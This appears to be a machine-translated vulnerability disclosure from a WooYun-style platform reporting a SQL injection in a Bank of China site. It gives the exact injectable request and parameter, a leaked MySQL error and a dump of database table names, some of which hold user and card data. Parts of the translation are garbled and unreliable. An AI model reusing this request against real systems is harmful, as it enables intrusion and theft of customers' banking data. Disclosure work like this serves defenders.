漏洞标题 MySQL注入中国银行的一个站点(涉及管理员密码/大量用户卡号信息) 相关制造商 中国银行 漏洞作者 Aasron 提交时间 2016-05-05 10: 24 公共时间 2016-06-19 22: 10 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php +字符型注入,注入技术,Mysql 漏洞详细信息 PUT /interFace/getAppUpdate.php HTTP/1.1 主机: open.boc.cn 内容类型:应用程序/json 连接:关闭 接受: application/json 用户代理: ESchool/1.1 CFNetwork/758.3.15 Darwin/15.4.0 接受语言: zh-cn Accept-Encoding: gzip,deflate 内容长度: 29 {'clientid':'399','type':'1'} 注射参数#clientid 正常返回内容 {'clientkey':'399','version':'1.0.2','appversion':'177','appurl':'http: \/\/open.boc.cn \/apps \/appdownload \/41295','need_update':'0','new_function':'','appfilesize':'','incrementSize':''} 报告错误 < b> MySQL服务器错误报告:数组 ( [0]=>数组 ( [message]=> MySQL查询错误 ) [1]=>数组 ( [sql]=> SELECT goods_name,ios_file,app_version,goods_id,client_key as clientkey,need_update,new_function,category_ver as appversion FROM.ec` .aps_goods` where client_key=399' ) [2]=>数组 ( Failure when receiving data from the peer | aps_affiliate_log | | aps_agency | | aps_apps | | aps_apps_bak150321 | | aps_apps_bak151205 | | aps_apps_cat | | aps_apps_relation | | aps_area_region | | aps_article | | aps_article_cat | | aps_article_cat_bak | | aps_article_comment | | aps_attribute | | aps_auction_log | | aps_auto_manage | | aps_back_goods | | aps_back_order | | aps_bank_info | | aps_banner | | aps_bonus_type | | aps_booking_goods | | aps_brand | | aps_card | | aps_card_trans_audit | | aps_cart | | aps_cat_recommend | | aps_category | | aps_collect_goods | | aps_comment | | aps_crons | | aps_custom_pads | | aps_customs | | aps_dcode | | aps_delivery_goods | | aps_delivery_order | | aps_dic_h5_interface | | aps_dic_paper_category | | aps_dic_site_letter | | aps_download_log | | aps_email_list | | aps_email_sendlist | | aps_error_log | | aps_exchange_goods | | aps_failedlogin | | aps_favourable_activity | | aps_feedback | | aps_friend_link | | aps_general_bank | | aps_general_interface | | aps_goods | | aps_goods_20141206 | | aps_goods_activity | | aps_goods_article | | aps_goods_attr | | aps_goods_bak150321 | | aps_goods_bak151205 | | aps_goods_cat | | aps_goods_gallery | | aps_goods_interface | | aps_goods_interface_bak151205 | | aps_goods_relation | | aps_goods_type | | aps_goods_whites | | aps_group_goods | | aps_interface | | aps_interface0321 | | aps_keywords | | aps_link_goods | | aps_log_conf | | aps_log_data | | aps_log_goods_download | | aps_mail_templates | | aps_manage_ip | | aps_match_goods | | aps_matchor | | aps_member_price | Failure when receiving data from the peer | aps_suppliers | | aps_tag | | aps_template | | aps_topic | | aps_user_account | | aps_user_address | | aps_user_app | | aps_user_bonus | | aps_user_feed | | aps_user_pictures | | aps_user_pictures_copy | | aps_user_rank | | aps_user_test_account | | aps_user_test_card | | aps_user_trans_audit | | aps_users | | aps_users_bak | | aps_users_bak150321 | | aps_users_bak150321_copy | | aps_users_copy | | aps_validate_code | | aps_validate_code_copy | | aps_virtual_card | | aps_volume_price | | aps_vote | | aps_vote_log | | aps_vote_option | | aps_wholesale | + ------------------------------- +
确保用户安全,无需深度测试 修理计划: 过滤马 版权声明:请注明出处Aasron @乌云